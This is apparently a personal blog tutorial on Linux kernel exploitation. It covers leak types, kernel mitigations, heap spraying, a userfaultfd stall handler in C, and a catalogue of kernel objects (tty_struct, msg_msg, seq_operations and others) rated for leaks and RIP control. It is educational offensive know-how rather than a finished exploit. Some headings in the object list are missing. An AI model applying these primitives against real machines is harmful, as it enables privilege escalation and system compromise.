When someone figures out how to take advantage of a bug, it becomes a security issue. If you have found a bug in kernel land and are trying to figure out what to do next, this post may help you along the way.
From "Stairway to Successful Kernel Exploitation" by Enrico Perla and Massimiliano Oldani: to develop a good exploit, we must understand the vulnerability we are targeting, the kernel subsystems involved, and the techniques we are using.
First things first: a good exploit is
* Reliable
* Safe
* Effective
* The list of preconditions that must be met for the exploit to work must be narrowed down
as much as possible.
* The parts of the exploit that might crash the machine must be identified.
* The exploit must leave the machine in a stable state.
* It is not a must, but the exploit should be portable, meaning it should work on as many targets
as possible.
So, back to the subject. From a security point of view, the question is "what kind of advantages are we looking for?"
We are looking for:
* Memory leaks
* Stack addresses/values
* Heap addresses/values
* Kernel data segment
* Arbitrary Read/Write
* RIP Control
Stack Leak
* Stack addresses/values are a very useful type of leak because there may be no other way to learn
where the stack is. A sufficiently large leak also reveals the stack canary and its value.
Since the kernel stack is allocated once and stays where it is, this leak is very powerful.
Heap Leak
* The generic case of a heap leak is the ability to leak memory around an object, either before or after it.
This leak may expose information about the state of the previous/next object.
Kernel Data Segment Leak
* The data segment of the kernel is laid out at compilation time. A leak from this segment
may expose the value of some kernel configuration or let you recover some kernel symbols.
Even if it does not, it gives you a precise offset to use in later steps of your
exploit code. Although a leak from here is convenient, it is not the only information you need to
make your exploit reliable: it helps in the triggering steps of your exploit but not in the earlier
stages.
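To make the "precise offset" idea concrete, here is a minimal sketch of turning one leaked kernel pointer into a KASLR slide and rebasing other symbols with it. The function names and the default base constant are my own for illustration; on a real target the unrandomized addresses come from the matching vmlinux or System.map, and the sketch assumes the randomized address is not below the unrandomized one.

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative constant: the usual x86_64 kernel text base without KASLR.
 * Treat it as an assumption and check it against the target's vmlinux. */
#define KERNEL_TEXT_DEFAULT 0xffffffff81000000ULL

/* Turn one leaked kernel pointer into the KASLR slide, given the address the
 * same symbol has in the non-randomized image. */
uint64_t kaslr_slide(uint64_t leaked, uint64_t unslid_symbol)
{
    assert(leaked >= unslid_symbol); /* assumption of this sketch */
    return leaked - unslid_symbol;
}

/* Rebase any other symbol of the same image once the slide is known. */
uint64_t rebase(uint64_t unslid_symbol, uint64_t slide)
{
    return unslid_symbol + slide;
}
```

One leaked function pointer is enough: every other symbol of the same image moves by the same slide.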
Arbitrary Write
* Reading information out of kernel land is only half of the job; we also need to get our own data into it.
With the information gathered from leaks, we push data into kernel land with the intention of
making the kernel do something unintended. To do so, we need to find a memory area that is under our control.
In most cases the amount of space we can use is limited, so be careful about the size of
your payload and be sure about where it will land. Arbitrary read/write can arise in scenarios
such as:
* Buffer copy without checking size of input (Buffer overflow)
* Buffer Underflow
* Write-what-where condition
* Incorrect calculation of buffer size
* Access of memory location before start/after end of buffer
* Buffer access with incorrect length value
* Free of memory not on the Heap
* Double free
* Use after free
* Race conditions
It is also worth mentioning that when you try to take advantage of a bug, you are restricted by Linux kernel mitigations, just as you are by mitigations in userland. A few of them are:
* Kernel stack cookies: Exactly the same as stack canaries in userland.
* Kernel address space layout randomization (KASLR): Like ASLR in userland.
It randomizes the kernel base address each time the system is booted.
* Supervisor mode execution protection (SMEP): This feature makes all userland pages
non-executable while the CPU is running in kernel mode.
* Supervisor mode access prevention (SMAP): This feature makes all userland pages
inaccessible while the CPU is running in kernel mode.
* Kernel page-table isolation (KPTI): With this feature, the kernel keeps separate page tables for user land and kernel land.
The user-land page tables contain only a minimal set of kernel addresses, which minimizes the attack surface.
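Before planning anything, it helps to know which of these mitigations the target advertises. The sketch below is my own helper, not something from the referenced posts: it looks for the `smep`, `smap` and `pti` words in the `flags` line of `/proc/cpuinfo` on x86 Linux. A flag being present only means the feature is advertised there; boot parameters can still change what is active.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Return true if `name` appears as a whole whitespace-separated word in `line`. */
bool has_flag(const char *line, const char *name)
{
    size_t n = strlen(name);
    if (n == 0)
        return false;
    for (const char *p = strstr(line, name); p != NULL; p = strstr(p + 1, name)) {
        bool starts = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        bool ends = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';
        if (starts && ends)
            return true;
    }
    return false;
}

/* Print the mitigation-related flags of the first CPU listed in /proc/cpuinfo. */
void report_cpu_mitigations(void)
{
    char line[8192];
    FILE *f = fopen("/proc/cpuinfo", "r");
    if (f == NULL) {
        perror("fopen /proc/cpuinfo");
        return;
    }
    while (fgets(line, sizeof(line), f) != NULL) {
        if (strncmp(line, "flags", 5) != 0)
            continue;
        printf("SMEP: %s\n", has_flag(line, "smep") ? "yes" : "no");
        printf("SMAP: %s\n", has_flag(line, "smap") ? "yes" : "no");
        printf("PTI : %s\n", has_flag(line, "pti") ? "yes" : "no");
        break; /* the first CPU is enough for a quick look */
    }
    fclose(f);
}
```

KASLR and stack cookies do not show up here; they are kernel build and boot options rather than CPU flags.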
As noted, we need reliability, and it often depends on memory layout and alignment. Memory alignment and the state of the operating system introduce a lot of randomness when we are dealing with a bug. The common way to deal with this chaos is to place a lot of NOPs or to allocate a lot of memory. Allocating a large amount of memory is called heap spraying. A heap spray can compensate for this chaos and increase the chances of successful exploitation. In addition, the start location of a large heap allocation is more predictable, and consecutive allocations are approximately sequential. This means that the sprayed heap will land in roughly the same location every time the heap spray is run.
- // Simple heap spraying example
- int ptmx[0x100];
- for (int i = 0; i < 0x100; ++i)
-     ptmx[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY); // each open allocates a tty_struct
- for (int i = 0; i < 0x100; ++i)
-     close(ptmx[i]); // closing releases them again
Which advantage you can get from a bug depends on which mitigations are enabled and which functions of the vulnerable driver are available. Let's say you have found a bug that causes a use-after-free, but the size you can allocate is fixed. Then you need to find "usable" kernel objects whose size matches your allocation size. Before looking for such objects, let's look at the ideal conditions, as explained by Vitaly Nikolenko in the "Linux Kernel universal heap spray" blog post.
- Object size is controlled by the user.
- No restrictions even for very small objects (kmalloc-8)
- Object content is controlled by the user.
- No uncontrolled header at the beginning of the object.
- The target object should "stay" in the kernel during the exploitation stage.
For the first and second conditions, we need a kmalloc -> kfree execution path that gives us control over the size and content of an object. For example, setxattr is one way to do that. For the last condition, we need to keep that object in memory while our code is running. One way to hold the object in place is userfaultfd.
The idea behind userfaultfd is to handle page faults in user space. For example, the first read or write access to an mmap() region that has no page behind it yet triggers the page fault handler in kernel space. With userfaultfd, these faults can be processed in user space by a separate thread.
The only problem with this approach is that the faulting thread stays suspended while the page fault is handled in the separate thread. No worries: this can be solved by forking another process or by using a second thread.
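As a minimal sketch of the setxattr path mentioned above: on the kernels the referenced posts describe, the syscall allocates a kernel buffer of the requested size, copies the user value into it, and frees it before returning. The wrapper name and the `user.spray` attribute name are my own choices for illustration.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/xattr.h>

/* Ask the kernel to copy `size` bytes of `payload` into a temporary kernel
 * buffer via setxattr(2). Returns 0 on success or -1 with errno set. For
 * spraying, the return value matters less than the allocation the call makes
 * on its way through the kernel. */
int xattr_alloc_free(const char *path, const void *payload, size_t size)
{
    return setxattr(path, "user.spray", payload, size, 0);
}
```

Both the size and the content are chosen by the caller, which covers the first two conditions. The buffer is freed as soon as the call returns, which is why it needs something like userfaultfd to satisfy the last one.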
- // Here is an example of how you can set up a page fault handler.
- #define _GNU_SOURCE
- #include <fcntl.h>
- #include <linux/userfaultfd.h>
- #include <poll.h>
- #include <pthread.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <sys/ioctl.h>
- #include <sys/mman.h>
- #include <sys/syscall.h>
- #include <unistd.h>
-
- #define errexit(msg) \
-   do { \
-     perror(msg); \
-     exit(EXIT_FAILURE); \
-   } while (0)
-
- void *fault_handler_thread(void *arg) {
-   struct uffd_msg msg;
-   struct uffdio_copy uffdio_copy;
-   static char *page = NULL; // source page that is copied to the faulting address
-   long uffd = (long)arg;
-   long page_size = sysconf(_SC_PAGE_SIZE);
-   ssize_t len;
-   int nready;
-
-   if (page == NULL) {
-     page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
-                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
-     if (page == MAP_FAILED)
-       errexit("mmap (userfaultfd)");
-   }
-
-   for (;;) {
-     struct pollfd pollfd;
-     pollfd.fd = uffd;
-     pollfd.events = POLLIN;
-     // wait until the kernel reports a fault on the registered range
-     nready = poll(&pollfd, 1, -1);
-
-     if (nready == -1)
-       errexit("poll");
-     printf("[+] fault_handler_thread():\n");
-     printf("poll() returns: nready = %d; "
-            "POLLIN = %d; POLLERR = %d\n",
-            nready, (pollfd.revents & POLLIN) != 0,
-            (pollfd.revents & POLLERR) != 0);
-
-     len = read(uffd, &msg, sizeof(msg));
-     if (len == 0)
-       errexit("userfaultfd EOF");
-     if (len == -1)
-       errexit("read");
-     if (msg.event != UFFD_EVENT_PAGEFAULT)
-       errexit("msg.event");
-
-     printf("[+] UFFD_EVENT_PAGEFAULT event: \n");
-     printf(" flags = 0x%llx\n", msg.arg.pagefault.flags);
-     printf(" address = 0x%llx\n", msg.arg.pagefault.address);
-     // resolve the fault by copying our page to the page-aligned fault address
-     uffdio_copy.src = (unsigned long)page;
-     uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address &
-                       ~(page_size - 1);
-     uffdio_copy.len = page_size;
-     uffdio_copy.mode = 0;
-     uffdio_copy.copy = 0;
-     if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
-       errexit("ioctl: UFFDIO_COPY");
-     printf("[+] uffdio_copy.copy = %lld\n", uffdio_copy.copy);
-   }
- }
- // Then register a memory range and start the handler thread like this
- void setup_pagefault(void *addr, unsigned size) {
-   long uffd;
-   pthread_t th;
-   struct uffdio_api api;
-   struct uffdio_register reg;
-   int s;
-
-   // create a new userfaultfd object
-   uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
-   if (uffd == -1)
-     errexit("userfaultfd");
-
-   // enable the uffd object
-   api.api = UFFD_API;
-   api.features = 0;
-   if (ioctl(uffd, UFFDIO_API, &api) == -1)
-     errexit("ioctl: UFFDIO_API");
-
-   // register the memory range
-   reg.range.start = (unsigned long)addr;
-   reg.range.len = size;
-   reg.mode = UFFDIO_REGISTER_MODE_MISSING;
-   if (ioctl(uffd, UFFDIO_REGISTER, &reg) == -1)
-     errexit("ioctl: UFFDIO_REGISTER");
-
-   // handle page faults in a separate thread
-   s = pthread_create(&th, NULL, fault_handler_thread, (void *)uffd);
-   if (s != 0)
-     errexit("pthread_create");
- }
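- // Calling part
- int main(void) {
-   // Allocate memory for userfaultfd
-   void *pages = mmap((void *)0x77770000, 0x4000, PROT_READ | PROT_WRITE,
-                      MAP_FIXED | MAP_PRIVATE | MAP_ANON, -1, 0);
-   if ((unsigned long)pages != 0x77770000)
-     errexit("mmap (0x77770000)");
-   setup_pagefault(pages, 0x4000);
-   // The first access to the registered range blocks until the handler
-   // thread resolves the fault with UFFDIO_COPY.
-   printf("first byte: %d\n", *(volatile char *)pages);
-   return 0;
- }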
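To hold a kernel object in place with this handler, the usual trick (described in the heap spray post linked at the bottom) is to pass the kernel a buffer that straddles the boundary between an ordinary page and a userfaultfd-registered page. The kernel copies the bytes on the ordinary page, then faults on the registered page and waits for the handler. A minimal sketch of the pointer arithmetic follows; the function name and parameters are my own.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Start address for a buffer whose first `controlled` bytes sit on an
 * ordinary, already-populated page and whose next byte is the first byte of
 * `fault_page`, the start of a userfaultfd-registered page. The ordinary page
 * is assumed to be mapped directly before `fault_page`. */
void *straddle_start(void *fault_page, size_t controlled, size_t page_size)
{
    assert(controlled <= page_size); /* must fit on the preceding page */
    return (uint8_t *)fault_page - controlled;
}
```

With the mapping from main() above, one option is to register only the second page, for example `setup_pagefault((char *)pages + 0x1000, 0x1000)`, fill 24 bytes at `straddle_start((char *)pages + 0x1000, 24, 0x1000)`, and hand that pointer to setxattr with a size of 32. The object then stays allocated with your 24 bytes in it for as long as the handler thread delays its UFFDIO_COPY.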
As mentioned earlier, if the size of the memory you can allocate is fixed, you need to find "usable" kernel objects whose size matches your allocation size. Below are some objects, usable depending on your needs, that ptr-yudai found and briefly explained (the link to the original blog post is at the bottom of the page).
(ptr-yudai's list is very informative and well explained in his blog, but I would like to expand it if there are new structures that can be useful. The problem is that I am not experienced enough to search for them yet. I will study and see what I can do. From here on, the material is translated from ptr-yudai's blog and cross-referenced with the Linux source code. I will work on it further later.)
- -
- - shm_file_data
- - seq_operations
- - msg_msg (+ user-supplied data)
- - subprocess_info
- - cred
- - file
- - timerfd_ctx
- - tty_struct
- -
- - msg_msg
- - setxattr
- - sendmsg
- struct shm_file_data {
- int id;
- struct ipc_namespace *ns;
- struct file *file;
- const struct vm_operations_struct *vm_ops;
- };
Size: 0x20 (kmalloc-32)
Base: *ns and *vm_ops point into the kernel data area, so a leak is possible.
Heap: A leak is possible because *file points into the heap area.
RIP Control: No.
Allocation: map shared memory with shmat
- struct seq_operations {
- void * (*start) (struct seq_file *m, loff_t *pos);
- void (*stop) (struct seq_file *m, void *v);
- void * (*next) (struct seq_file *m, void *v, loff_t *pos);
- int (*show) (struct seq_file *m, void *v);
- };
Size: 0x20 (kmalloc-32)
Base: Can leak 4 function pointers
Heap: No
Stack: No
RIP: Possible
Allocation: Opening a file that uses single_open (ex: /proc/self/stat)
Release: Close that file
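A minimal sketch of the allocation and release steps for seq_operations: every open of /proc/self/stat makes one allocation, and closing the descriptor releases it. The helper names are hypothetical.

```c
#include <fcntl.h>
#include <unistd.h>

/* Open /proc/self/stat up to `n` times and store the descriptors in `fds`.
 * Returns how many opens succeeded. */
int spray_seq_ops(int *fds, int n)
{
    int opened = 0;
    for (int i = 0; i < n; i++) {
        int fd = open("/proc/self/stat", O_RDONLY);
        if (fd < 0)
            break;
        fds[opened++] = fd;
    }
    return opened;
}

/* Close the first `n` descriptors, releasing the objects again. */
void release_seq_ops(const int *fds, int n)
{
    for (int i = 0; i < n; i++)
        close(fds[i]);
}
```

Keeping the descriptors in an array makes it possible to release a chosen subset later, which is handy when you want a freed slot to be reclaimed by another object.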
- struct msg_msg {
- struct list_head m_list;
- long m_type;
- size_t m_ts; /* message text size */
- struct msg_msgseg *next;
- void *security;
- /* the actual message follows immediately */
- };
Size: Various (0x31 to 0x1000 / kmalloc-64 and above)
Base: No
Heap: A leak is possible because m_list links to the neighbouring messages in the queue, and struct msg_msgseg *next points to the continuation segment of a large message.
Stack: No
RIP: No
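Since the message text follows the header directly, the text length decides which cache the object lands in. Below is a minimal sketch, assuming the 48-byte header that the struct above has on x86_64; the helper names and the 4096-byte local buffer are my own choices.

```c
#include <assert.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define MSG_HDR_SIZE 48 /* sizeof(struct msg_msg) on x86_64; an assumption elsewhere */

/* Text length that makes header + text exactly fill a `cache_size`-byte slot. */
size_t msg_text_len(size_t cache_size)
{
    assert(cache_size > MSG_HDR_SIZE);
    return cache_size - MSG_HDR_SIZE;
}

/* Queue one message whose text is `len` bytes of `fill`. Returns 0 or -1. */
int send_filled_msg(int qid, size_t len, char fill)
{
    struct {
        long mtype;
        char mtext[4096];
    } m;

    if (len > sizeof(m.mtext))
        return -1;
    m.mtype = 1; /* msgsnd requires a positive type */
    memset(m.mtext, fill, len);
    return msgsnd(qid, &m, len, IPC_NOWAIT);
}
```

A queue for this can be created with `msgget(IPC_PRIVATE, IPC_CREAT | 0600)`; `send_filled_msg(qid, msg_text_len(64), 'A')` would then target a 64-byte slot, and receiving the message with msgrcv frees it again.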
subprocess_info
Defined in umh.h
- struct subprocess_info {
- struct work_struct work;
- struct completion *complete;
- const char *path;
- char **argv;
- char **envp;
- struct file *file;
- int wait;
- int retval;
- pid_t pid;
- int (*init)(struct subprocess_info *info, struct cred *new);
- void (*cleanup)(struct subprocess_info *info);
- void *data;
- } __randomize_layout;
Size: 0x60 (kmalloc-128)
Base: work.func points to call_usermodehelper_exec_work, so a leak is possible.
Heap: Possible
Stack: No
RIP: Can be controlled by overwriting cleanup, which requires winning a race condition.
- struct cred {
- atomic_t usage;
- #ifdef CONFIG_DEBUG_CREDENTIALS
- atomic_t subscribers; /* number of processes subscribed */
- void *put_addr;
- unsigned magic;
- #define CRED_MAGIC 0x43736564
- #define CRED_MAGIC_DEAD 0x44656144
- #endif
- kuid_t uid; /* real UID of the task */
- kgid_t gid; /* real GID of the task */
- kuid_t suid; /* saved UID of the task */
- kgid_t sgid; /* saved GID of the task */
- kuid_t euid; /* effective UID of the task */
- kgid_t egid; /* effective GID of the task */
- kuid_t fsuid; /* UID for VFS ops */
- kgid_t fsgid; /* GID for VFS ops */
- unsigned securebits; /* SUID-less security management */
- kernel_cap_t cap_inheritable; /* caps our children can inherit */
- kernel_cap_t cap_permitted; /* caps we're permitted */
- kernel_cap_t cap_effective; /* caps we can actually use */
- kernel_cap_t cap_bset; /* capability bounding set */
- kernel_cap_t cap_ambient; /* Ambient capability set */
- #ifdef CONFIG_KEYS
- unsigned char jit_keyring; /* default keyring to attach requested
- * keys to */
- struct key __rcu *session_keyring; /* keyring inherited over fork */
- struct key *process_keyring; /* keyring private to this process */
- struct key *thread_keyring; /* keyring private to this thread */
- struct key *request_key_auth; /* assumed request_key authority */
- #endif
- #ifdef CONFIG_SECURITY
- void *security; /* subjective LSM security */
- #endif
- struct user_struct *user; /* real user ID subscription */
- struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
- struct group_info *group_info; /* supplementary groups for euid/fsgid */
- /* RCU deletion */
- union {
- int non_rcu; /* Can we skip RCU deletion? */
- struct rcu_head rcu; /* RCU deletion hook */
- };
- } __randomize_layout;
Size: 0xa8 (kmalloc-192)
Base: No
Heap: Possible through session_keyring
Stack: No
RIP: No
- struct file {
- union {
- struct llist_node fu_llist;
- struct rcu_head fu_rcuhead;
- } f_u;
- struct path f_path;
- struct inode *f_inode; /* cached value */
- const struct file_operations *f_op;
-
- /*
- * Protects f_ep_links, f_flags.
- * Must not be taken from IRQ context.
- */
- spinlock_t f_lock;
- enum rw_hint f_write_hint;
- atomic_long_t f_count;
- unsigned int f_flags;
- fmode_t f_mode;
- struct mutex f_pos_lock;
- loff_t f_pos;
- struct fown_struct f_owner;
- const struct cred *f_cred;
- struct file_ra_state f_ra;
-
- u64 f_version;
- #ifdef CONFIG_SECURITY
- void *f_security;
- #endif
- /* needed for tty driver, and maybe others */
- void *private_data;
-
- #ifdef CONFIG_EPOLL
- /* Used by fs/eventpoll.c to link all the hooks to this file */
- struct list_head f_ep_links;
- struct list_head f_tfile_llink;
- #endif /* #ifdef CONFIG_EPOLL */
- struct address_space *f_mapping;
- errseq_t f_wb_err;
- } __randomize_layout
- __attribute__((aligned(4))); /* lest something weird decides that 2 is OK */
Size: (kmalloc-256)
Base: f_op points to data area of the kernel, so it's possible.
Heap: ?
Stack: ?
Allocation: Create shared memory with shmget
Release: Discard with shmctl
Note: RIP control is possible if you can overwrite f_op and then call shmctl.
- struct timerfd_ctx {
- union {
- struct hrtimer tmr;
- struct alarm alarm;
- } t;
- ktime_t tintv;
- ktime_t moffs;
- wait_queue_head_t wqh;
- u64 ticks;
- int clockid;
- short unsigned expired;
- short unsigned settime_flags; /* to show in fdinfo */
- struct rcu_head rcu;
- struct list_head clist;
- spinlock_t cancel_lock;
- bool might_cancel;
- };
Size: (kmalloc-256)
Base: tmr.function points to timerfd_tmrproc so it's possible.
Heap: Can leak (from tmr.base)
Stack: No
RIP: No
- struct tty_struct {
- int magic;
- struct kref kref;
- struct device *dev;
- struct tty_driver *driver;
- const struct tty_operations *ops;
- int index;
-
- /* Protects ldisc changes: Lock tty not pty */
- struct ld_semaphore ldisc_sem;
- struct tty_ldisc *ldisc;
-
- struct mutex atomic_write_lock;
- struct mutex legacy_mutex;
- struct mutex throttle_mutex;
- struct rw_semaphore termios_rwsem;
- struct mutex winsize_mutex;
- spinlock_t ctrl_lock;
- spinlock_t flow_lock;
- /* Termios values are protected by the termios rwsem */
- struct ktermios termios, termios_locked;
- struct termiox *termiox; /* May be NULL for unsupported */
- char name[64];
- struct pid *pgrp; /* Protected by ctrl lock */
- struct pid *session;
- unsigned long flags;
- int count;
- struct winsize winsize; /* winsize_mutex */
- unsigned long stopped:1, /* flow_lock */
- flow_stopped:1,
- unused:BITS_PER_LONG - 2;
- int hw_stopped;
- unsigned long ctrl_status:8, /* ctrl_lock */
- packet:1,
- unused_ctrl:BITS_PER_LONG - 9;
- unsigned int receive_room; /* Bytes free for queue */
- int flow_change;
-
- struct tty_struct *link;
- struct fasync_struct *fasync;
- wait_queue_head_t write_wait;
- wait_queue_head_t read_wait;
- struct work_struct hangup_work;
- void *disc_data;
- void *driver_data;
- spinlock_t files_lock; /* protects tty_files list */
- struct list_head tty_files;
-
- #define N_TTY_BUF_SIZE 4096
-
- int closing;
- unsigned char *write_buf;
- int write_cnt;
- /* If the tty has a pending do_SAK, queue it here - akpm */
- struct work_struct SAK_work;
- struct tty_port *port;
- } __randomize_layout;
Size: 0x2e0 (kmalloc-1024)
Base: *ops points to ptm_unix98_ops so it's possible.
Heap: Various leaks are possible
Stack: No
Allocation: Open /dev/ptmx
Release: Close /dev/ptmx
RIP: RIP can be controlled by rewriting *ops
(msg_msg: already mentioned.)
Size: Various (<=65535)
Reserve: Call with the pointer and size
Notes: Use with userfaultfd (First 48 bytes cannot be written)
Size: Various(>=2)
Reserve: Call with the pointer and size
Notes: Combine with userfaultfd
- https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
- https://duasynt.com/blog/linux-kernel-heap-spray
- https://smallkirby.hatenablog.com/archive
- https://github.com/smallkirby/kernelpwn
- Enrico Perla and Massimiliano Oldani, "A Guide to Kernel Exploitation: Attacking the Core", Chapter 3: "Stairway to Successful Kernel Exploitation"